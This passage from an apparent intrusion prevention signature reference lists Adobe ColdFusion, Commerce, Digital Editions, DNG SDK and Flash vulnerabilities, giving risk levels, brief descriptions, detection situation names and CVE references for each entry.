Platform: Generic
Software: Adobe ColdFusion
Type: Input Validation
Description: Improper validation of RMI messages causes a vulnerability in Adobe ColdFusion. A successful exploit can allow an attacker to execute arbitrary code on the target system.
Situation: Generic_SS-Adobe-ColdFusion-Dataservicescfproxy-Commons-Beanutils-Insecure-Deserialization
References:
CVE-2018-15959
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15959
Back to top

Adobe-ColdFusion-Dataservicescfproxy-Rome-Framework-Insecure-Deserialization

About this vulnerability: A vulnerability in Adobe Systems ColdFusion (2016 release)
Risk: High
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe ColdFusion
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in the Flex integration service of Adobe ColdFusion. The vulnerability is due to the lack of input validation on the RMI method parameters of the DataServicesCFProxy class. A remote, unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted serialized parameter to the target application via a RMI call. Successful exploitation could result in arbitrary code execution in the context of SYSTEM.
Situation: Generic_SS-Adobe-ColdFusion-Dataservicescfproxy-Rome-Framework-Insecure-Deserialization
References:
CVE-2018-4939
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4939
Back to top

Adobe-ColdFusion-Deserialization-Of-Untrusted-Data-Vulnerability-CVE-2023-26360

About this vulnerability: An attempt to exploit a vulnerability in Adobe ColdFusion detected
Risk: High
First detected in: sgpkg-ips-1579-5242
Last changed: sgpkg-ips-1579-5242
Platform: Generic
Software: Adobe ColdFusion
Type: Input Validation
Description: Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier) are affected by an Improper Access Control vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction.
Situation: HTTP_CRL-Adobe-ColdFusion-Deserialization-Of-Untrusted-Data-Vulnerability-CVE-2023-26360
References:
CVE-2023-26360
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26360
Back to top

Adobe-ColdFusion-Directory-Traversal

About this vulnerability: A vulnerability in Adobe Systems ColdFusion
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe ColdFusion
Type: Input Validation
Description: A directory traversal vulnerability has been reported in Adobe ColdFusion.
Situation: HTTP_CRL-Adobe-ColdFusion-Directory-Traversal
References:
CVE-2010-2861
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2861
BID-42342
http://www.securityfocus.com/bid/42342
Back to top

Adobe-ColdFusion-FCKeditor-Multiple-Directory-Traversal-And-File-Execution

About this vulnerability: A multiple directory traversal vulnerability in Adobe ColdFusion FCKeditor
Risk: High
First detected in: sgpkg-ips-660-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe ColdFusion
Type: Directory Traversal
Description: A multiple directory traversal vulnerability in Adobe ColdFusion 8.0.1 FCKeditor that allows remote attackers to create executable files in arbitrary directories via directory traversal sequences in the input to unspecified connector modules.
Situation: HTTP_CRL-Adobe-ColdFusion-FCKeditor-Multiple-Directory-Traversal-And-File-Execution
References:
CVE-2009-2265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2265
OSVDB-55684
http://www.osvdb.org/55684
Back to top

Adobe-ColdFusion-Getargumentcollection-Insecure-Deserialization

About this vulnerability: A vulnerability in Adobe Systems ColdFusion
Risk: Moderate
First detected in: sgpkg-ips-1798-5242
Last changed: sgpkg-ips-1798-5242
Platform: Generic
Software: Adobe ColdFusion
Type: Input Validation
Description: Improper validation of user submitted serialized objects containing argumentCollection values causes a vulnerability in Adobe ColdFusion. A successful exploitation allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CSU-Adobe-ColdFusion-Getargumentcollection-Insecure-Deserialization
References:
CVE-2024-41874
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41874
Back to top

Adobe-ColdFusion-Improper-Access-Control-CVE-2024-20767

About this vulnerability: A vulnerability in Adobe ColdFusion
Risk: High
First detected in: sgpkg-ips-1819-5242
Last changed: sgpkg-ips-1819-5242
Platform: Generic
Software: Adobe ColdFusion
Type: Malfunction
Description: An improper access control vulnerability in Adobe ColdFusion allows unauthenticated attackers to read arbitrary files via crafted HTTP requests. Sensitive system information obtained with a successful exploit can be further used to compromise the target system.
Situation: HTTP_CSU-Adobe-ColdFusion-Improper-Access-Control-CVE-2024-20767
HTTP_CSH-Adobe-ColdFusion-Improper-Access-Control-File-Read-CVE-2024-20767
References:
CVE-2024-20767
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20767
Back to top

Adobe-ColdFusion-Improper-Access-Control-Vulnerability-CVE-2023-29298

About this vulnerability: A vulnerability in Adobe ColdFusion
Risk: High
First detected in: sgpkg-ips-1612-5242
Last changed: sgpkg-ips-1621-5242
Platform: Generic
Software: Adobe ColdFusion
Type: Malfunction
Description: An improper access control vulnerability has been reported in Adobe ColdFusion versions up to and including 2018u16, 2021u6, and 2023.0.0.330468. Successful exploitation of this vulnerability allows bypassing a security feature and can lead to further exploitation. This situation also covers CVE-2023-38205, which was assigned for a bypass to the patch that addressed CVE-2023-29298.
Situation: HTTP_CSU-Adobe-ColdFusion-Improper-Access-Control-Vulnerability-CVE-2023-29298
HTTP_CSU-Adobe-ColdFusion-Improper-Access-Control-Vulnerability-CVE-2023-29298-2
References:
CVE-2023-29298
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29298
Back to top

Adobe-ColdFusion-Insecure-Deserialization-CVE-2023-29300

About this vulnerability: An attempt to exploit a vulnerability in Adobe ColdFusion detected
Risk: High
First detected in: sgpkg-ips-1613-5242
Last changed: sgpkg-ips-1613-5242
Platform: Generic
Software: Adobe ColdFusion
Type: Input Validation
Description: Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a deserialization of untrusted data vulnerability that could result in arbitrary code execution. Exploitation of this issue does not require user interaction.
Situation: HTTP_CRL-Adobe-ColdFusion-Insecure-Deserialization
References:
CVE-2023-29300
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29300
Back to top

Adobe-ColdFusion-InvokeLoggingModule-Directory-Traversal-CVE-2024-53961

About this vulnerability: A vulnerability in Adobe ColdFusion
Risk: Moderate
First detected in: sgpkg-ips-1853-5242
Last changed: sgpkg-ips-1853-5242
Platform: Generic
Software: Adobe ColdFusion
Type: Directory Traversal
Description: Improper validation of user data in the invokeLoggingModule method causes a directory traversal vulnerability in Adobe ColdFusion. A successful exploitation allows an attacker to read arbitrary files on the target system.
Situation: HTTP_CSU-Adobe-ColdFusion-InvokeLoggingModule-Directory-Traversal-CVE-2024-53961
References:
CVE-2024-53961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53961
Back to top

Adobe-ColdFusion-Javaadapter-Javabeanadapter-Insecure-Deserialization

About this vulnerability: A vulnerability in Adobe ColdFusion
Risk: Moderate
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe ColdFusion
Type: Input Validation
Description: Lack of input validation of the JavaAdapter and JavaBeanAdapter classes causes a deserialization vulnerability in Adobe ColdFusion. A successful exploit may allow an attacker to execute arbitrary code with the privileges of the target process.
Situation: HTTP_CSU-Adobe-ColdFusion-Javaadapter-Javabeanadapter-Insecure-Deserialization
References:
CVE-2019-7091
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7091
Back to top

Adobe-ColdFusion-Rmi-Registry-Insecure-Deserialization

About this vulnerability: A vulnerability in Adobe Systems ColdFusion
Risk: Moderate
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1841-5242
Platform: Generic
Software: Adobe ColdFusion
Type: Input Validation
Description: Insecure deserialization of objects in the RMI registry causes a vulnerability in Adobe ColdFusion. A successful exploit allows an attacker to run arbitrary code on the target system with system-level privileges. This signature covers also vulnerability CVE-2017-11283.
Situation: Generic_CS-Suspicious-Java-Serialized-Object
References:
CVE-2017-11284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11284
Back to top

Adobe-ColdFusion-Scheduleedit.cfm-Authentication-Bypass

About this vulnerability: A vulnerability in Adobe Systems ColdFusion
Risk: High
First detected in: sgpkg-ips-508-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe ColdFusion
Type: Malfunction
Description: An authentication bypass vulnerability affects ColdFusion servers. The bypass allows an unauthenticated attacker to create a scheduled task which will be performed and allow attacker-controlled code to be uploaded to the vulnerable server. This vulnerability could be exploited though Remote Development Services (RDS) or Administrator interfaces if they do not require authentication or through CSRF if APSB12-26 has not been applied.
Situation: HTTP_CRL-Adobe-ColdFusion-Scheduleedit.cfm-Authentication-Bypass
References:
CVE-2013-0625
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0625
BID-57164
http://www.securityfocus.com/bid/57164
OSVDB-88889
http://www.osvdb.org/88889
Back to top

Adobe-Commerce-And-Magento-Open-Source-External-Entity-Injection-CVE-2024-34102

About this vulnerability: A vulnerability in Adobe Commerce
Risk: High
First detected in: sgpkg-ips-1756-5242
Last changed: sgpkg-ips-1769-5242
Platform: Generic
Software: Adobe Commerce; Adobe Magento Open Source
Type: Input Validation
Description: An XML External Entity Injection vulnerability has been reported in Adobe Commerce and Magento Open Source. Successful exploitation could result in sensitive information being disclosed to an unauthenticated attacker, allowing for a full administrator level access.
Situation: HTTP_CS-Xml-Dtd-External-Entity-Multiple-Vulnerabilities
HTTP_CS-Adobe-Commerce-And-Magento-Open-Source-External-Entity-Injection-CVE-2024-34102
References:
CVE-2024-34102
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-34102
Back to top

Adobe-Commerce-And-Magento-Open-Source-group.php-Cross-Site-Scripting

About this vulnerability: A vulnerability in Adobe Systems Commerce
Risk: High
First detected in: sgpkg-ips-1580-5242
Last changed: sgpkg-ips-1580-5242
Platform: Generic
Software: Adobe Commerce; Adobe Magento Open Source
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in Adobe Commerce and Magento Open Source. The vulnerability is due to improper validation of user set store codes on the server. A remote authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary script execution under the security context of the target user's browser.
Situation: HTTP_CRL-Adobe-Commerce-And-Magento-Open-Source-group.php-Cross-Site-Scripting
References:
CVE-2023-22249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22249
Back to top

Adobe-Commerce-And-Magento-Open-Source-Shipping-Policy-Cross-Site-Scripting

About this vulnerability: A vulnerability in Adobe Commerce
Risk: Moderate
First detected in: sgpkg-ips-1504-5242
Last changed: sgpkg-ips-1504-5242
Platform: Generic
Software: Adobe Commerce; Adobe Magento Open Source
Type: Input Validation
Description: Improper sanitization of user data causes a cross-site scripting vulnerability in Adobe Products. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CS-Adobe-Commerce-And-Magento-Open-Source-Shipping-Policy-Cross-Site-Scripting
References:
CVE-2022-34258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34258
Back to top

Adobe-Commerce-And-Magento-Open-Source-Widget-XML-Injection

About this vulnerability: A vulnerability in Adobe Commerce
Risk: Moderate
First detected in: sgpkg-ips-1523-5242
Last changed: sgpkg-ips-1523-5242
Platform: Generic
Software: Adobe Commerce; Adobe Magento Open Source
Type: Input Validation
Description: Insufficient validation of user data used to build XML files when submitting widgets causes an XML injection vulnerability in Adobe Commerce and Magento Open Source. A successful exploit may allow an attacker to execute scripts on a user's browser or code on the server.
Situation: HTTP_CRL-Adobe-Commerce-And-Magento-Open-Source-Widget-XML-Injection
References:
CVE-2022-34253
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34253
Back to top

Adobe-Digital-Editions-Epub-Xxe-Information-Disclosure

About this vulnerability: A vulnerability in Adobe Systems Digital Editions
Risk: Moderate
First detected in: sgpkg-ips-853-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Systems Digital Editions
Type: Malfunction
Description: Lack of validation of user-supplied data causes an information disclosure vulnerability in Adobe Systems Digital Editions. A successful exploit can allow an attacker to access files with the privileges of the target user.
Situation: File-TextId_Adobe-Digital-Editions-Epub-Xxe-Information-Disclosure
File-Text_Adobe-Digital-Editions-Epub-Xxe-Information-Disclosure
References:
CVE-2016-7889
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7889
Back to top

Adobe-DNG-Software-Development-Kit-Decodeimage-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Adobe Systems DNG Software Development Kit
Risk: Moderate
First detected in: sgpkg-ips-1254-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Systems DNG Software Development Kit
Type: Malfunction
Description: Improper parsing of JPEG data in DNG files in Adobe DNG Software Development Kit causes an out ouf bounds read vulnerability which can in some cases allow an attacker to execute code on the target system.
Situation: File-Binary_Adobe-DNG-Software-Development-Kit-Decodeimage-Out-Of-Bounds-Read
References:
CVE-2020-9622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9622
Back to top

Adobe-DNG-Software-Development-Kit-Readuncompressed-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems DNG Software Development Kit
Risk: Moderate
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Systems DNG Software Development Kit
Type: Buffer Overflow
Description: Improper parsing of data in DNG files in Adobe DNG Software Development Kit causes a hep buffer overflow vulnerability which can in some cases allow an attacker to execute code on the target system.
Situation: File-Binary_Adobe-DNG-Software-Development-Kit-Readunvar10ed-Heap-Buffer-Overflow
References:
CVE-2020-9590
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9590
Back to top

Adobe-Download-Manager-Getplus-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Download Manager
Risk: High
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Acrobat; Adobe Reader
Type: Buffer Overflow
Description: There is a stack buffer overflow in Adobe Download Manager, a part of Adobe Acrobat and Adobe Acrobat Reader. Remote attackers can exploit this vulnerability by enticing affected users to open a malicious web page in a vulnerable version of the product. A successful exploitation leads to arbitrary code execution in the context of the current user.
Situation: HTTP_SS-Adobe-Download-Manager-Getplus-ActiveX-Control-Buffer-Overflow
File-Text_Adobe-Download-Manager-Getplus-ActiveX-Control-Buffer-Overflow
References:
CVE-2009-3958
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3958
BID-37759
http://www.securityfocus.com/bid/37759
Back to top

Adobe-Flash-Asnative-Null-Pointer-Dereference

About this vulnerability: Adobe Flash Asnative Null Pointer Dereference vulnerability.
Risk: High
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Browser
Description: A vulnerability exists in Adobe Flash Player browser plugin, versions 9 and 10, that allows remote attackers to cause a denial of service by using the Asnative method to call function 15-0 with a string as the first parameter, or function 301-1 with less than two parameters.
Situation: File-Flash_Adobe-Flash-Asnative-Null-Pointer-Dereference
Back to top

Adobe-Flash-Bitmapdata-copyPixels-UAF

About this vulnerability: A vulnerability in Adobe Flash Player
Risk: High
First detected in: sgpkg-ips-1332-5242
Last changed: sgpkg-ips-1332-5242
Platform: Windows; OS X; Linux
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulberability in Adobe Flash Player, versions before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux, which allows remote attackers to execute arbitrary code via BitmapData.copyPixels.
Situation: File-Flash_Adobe-Flash-Bitmapdata-copyPixels-UAF
References:
CVE-2016-4229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4229
Back to top

Adobe-Flash-Buffer-Overflow-Vulnerability-CVE-2013-0633

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Buffer-Overflow-Vulnerability-CVE-2013-0633
References:
CVE-2013-0633
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0633
Back to top

Adobe-Flash-Buffer-Overflow-Vulnerability-CVE-2013-0634

About this vulnerability: A Buffer Overflow vulnerability exists in Adobe Flash.
Risk: Moderate
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Buffer-Overflow-Vulnerability-CVE-2013-0634
File-Flash_Adobe-Flash-Buffer-Overflow-Vulnerability-CVE-2013-0638
References:
CVE-2013-0634
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0634
Back to top

Adobe-Flash-Corrupted-SWF-File

About this vulnerability: Adobe Flash Corrupted-SWF File vulnerability.
Risk: High
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Browser
Description: A vulnerability exists in Adobe Flash Player browser plugin versions 10 that allows remote attackers to crash IE Explorer versions 6 through 8 by providing a corrupt .swf file.
Situation: File-Flash_Adobe-Flash-Corrupted-SWF-File
Back to top

Adobe-Flash-CVE-2010-3654-Remote-Code-Execution-Vulnerability

About this vulnerability: A vulnerability in Adobe Systems Acrobat Reader and Flash
Risk: High
First detected in: sgpkg-ips-393-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player; Adobe Reader; Adobe Acrobat
Type: Malfunction
Description: A vulnerability exists in the Adobe Flash Player, Reader and Acrobat.
Situation: HTTP_SS-Adobe-Flash-Exploit-CVE-2010-3643
File-Flash_Adobe-Flash-Exploit-CVE-2010-3643
References:
CVE-2010-3654
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3654
BID-44504
http://www.securityfocus.com/bid/44504
Back to top

Adobe-Flash-Heap-Overflow-Vulnerability-CVE-2016-4135

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Multiple-File-Loading-Vulnerabilities
References:
CVE-2016-4135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4135
Back to top

Adobe-Flash-Heap-Overflow-Vulnerability-CVE-2016-4136

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Multiple-File-Loading-Vulnerabilities
References:
CVE-2016-4136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4136
Back to top

Adobe-Flash-Iexternalizable-Interface-Readexternal-Method-Type-Confusion

About this vulnerability: A vulnerability in Adobe Systems Flash Player
Risk: High
First detected in: sgpkg-ips-716-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: A type confusion vulnerability has been reported in Adobe Flash. The vulnerability is due to the readExternal method enforced by the iExternalizable interface being treated as a function by the AVM despite the identifier "readExternal" being overwritten. A remote attacker could exploit this vulnerability by enticing a user into opening a specially crafted SWF or web page. Successful exploitation could lead to arbitrary code execution under the security context of the user process.
Situation: File-Flash_Adobe-Flash-Iexternalizable-Interface-Readexternal-Method-Type-Confusion
References:
CVE-2015-7647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7647
Back to top

Adobe-Flash-Iexternalizable-Interface-Type-Confusion

About this vulnerability: A vulnerability in Adobe Systems Flash Player
Risk: High
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a type confusion vulnerability in Adobe Flash. A remote attacker can use this to execute arbitrary code on the affected machine.
Situation: File-Flash_Adobe-Flash-Iexternalizable-Interface-Type-Confusion
References:
CVE-2015-7645
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7645
Back to top

Adobe-Flash-Json.stringify-Proxy-Object-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Flash Player
Risk: High
First detected in: sgpkg-ips-635-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: A heap buffer overflow vulnerability has been reported in Adobe Flash. The vulnerability is due to a failure to check the number of objects in a buffer prior to conducting a copy operation when calling JSON.stringify on a Proxy object. A remote unauthenticated attacker could exploit this vulnerability by enticing a user into opening a specially crafted page that embeds a malicious SWF. Successful exploitation could lead to arbitrary code execution under the security context of the user process.
Situation: File-Flash_Adobe-Flash-Json.stringify-Proxy-Object-Heap-Buffer-Overflow
References:
CVE-2015-0327
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0327
BID-72514
http://www.securityfocus.com/bid/72514
OSVDB-117977
http://www.osvdb.org/117977
Back to top

Adobe-Flash-Loadpcmfrombytearray-Use-After-Free

About this vulnerability: A vulnerability in Adobe Systems Adobe Flash Player Desktop Runtime
Risk: High
First detected in: sgpkg-ips-753-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a use-after-free vulnerability in Adobe Flash. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Flash_Adobe-Flash-Loadpcmfrombytearray-Use-After-Free
References:
CVE-2016-0984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0984
Back to top

Adobe-Flash-Media-Content

About this vulnerability: Arbitary Adobe Flash media content transfer
Risk: Low
First detected in: sgpkg-ips-172-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Insecure Configuration
Description: Adobe Flash Player is a multimedia player that uses various file formats to display interactive content.
Situation: Shared_CS-Flash-Video-Upload
Shared_SS-Flash-Video-Download
E-Mail_BS-Adobe-Flash-Embedded-In-PDF-Download
HTTP_SS-Adobe-Flash-Embedded-In-PDF-Download
HTTP_SS-Adobe-Flash-Media-Download
HTTP_SS-Adobe-Flash-Embedded-In-OLE-Document-Download
File-OLE_Adobe-Flash-Embedded-In-OLE-Document
File-Flash_Adobe-Flash-Media-Transfer
File-PDF_Embedded-Adobe-Flash
Back to top

Adobe-Flash-Memory-Corruption-CVE-2012-5267

About this vulnerability: An attempt to exploit a vulnerability in Adobe Flash was detected
Risk: Moderate
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: An attempt to exploit a vulnerability in Adobe Flash was detected
Situation: File-Flash_Adobe-Flash-Memory-Corruption-CVE-2012-5267
References:
CVE-2012-5267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5267
OSVDB-86044
http://www.osvdb.org/86044
Back to top

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4132

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4132
References:
CVE-2016-4132
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4132
Back to top

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4133

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4133
References:
CVE-2016-4133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4133
Back to top

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4137

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Multiple-File-Loading-Vulnerabilities
References:
CVE-2016-4137
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4137
Back to top

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4138

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Multiple-File-Loading-Vulnerabilities
References:
CVE-2016-4138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4138
Back to top

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4141

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Binary_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4141
References:
CVE-2016-4141
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4141
Back to top

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4150

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4150
References:
CVE-2016-4150
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4150
Back to top

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4151

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4151
References:
CVE-2016-4151
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4151
Back to top

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4152

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4152
References:
CVE-2016-4152
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4152
Back to top

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4153

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4153
References:
CVE-2016-4153
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4153
Back to top

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4154

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4154
References:
CVE-2016-4154
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4154
Back to top

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4155

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4155
References:
CVE-2016-4155
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4155
Back to top

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4156

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in Adobe Flash.
Situation: File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4156
References:
CVE-2016-4156
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4156
Back to top

Adobe-Flash-Mp3-Id3-Tag-Integer-Overflow

About this vulnerability: A vulnerability in Adobe Systems AIR desktop runtime
Risk: High
